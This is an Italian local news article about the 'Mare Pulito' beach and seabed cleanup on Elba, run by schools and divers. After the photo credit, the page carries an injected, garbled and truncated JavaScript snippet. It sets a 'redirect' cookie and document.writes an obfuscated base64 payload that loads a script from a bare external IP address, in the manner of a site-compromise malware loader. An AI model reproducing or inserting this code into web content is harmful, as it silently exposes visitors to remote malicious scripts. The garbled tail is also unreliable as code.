Si è svolta ieri, 7 maggio, la manifestazione Mare Pulito organizzata dal CED Centri Elbani Diving in collaborazione con il Parco Nazionale Arcipelago Toscano, i Comuni dell’Isola, Forze dell’ordine e Associazioni.
Centinaia i bambini delle scuole che hanno partecipato a questa importante iniziativa a difesa dell’ambiente.
Con pazienza, curiosità e allegria, i piccoli volontari, non solo hanno ripulito le spiagge dai rifiuti ma sono stati coinvolti anche in laboratori di biologia marina, monitoraggi e altre interessanti attività legate al mare.
Contemporaneamente i subacquei del CED si sono dedicati alla pulizia dei fondali antistanti le spiagge.
La manifestazione si è conclusa con un abbondante e meritato rinfresco e sono stati consegnati gadgets ai piccoli volontari che hanno dato un piccolo grande contributo all’ambiente marino.
Le spiagge coinvolte in questa edizione di Mare Pulito sono state: Lido di Capoliveri, Portoferraio, Sant’Andrea, Marciana Marina, Enfola e Marina di Campo ma hanno partecipato tutte le scuole degli otto comuni dell’Isola d’Elba accompagnati dai loro insegnanti , entusiasti dell’iniziativa.
L’Appuntamento è per il prossimo anno con molte novità senza dimenticare che questi piccoli gesti a difesa del Mare devono essere compiuti ogni giorno considerando che tutti noi siamo fruitori di un ambiente meraviglioso che merita di essere rispettato e valorizzato.
Ph Andrea Romoli
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘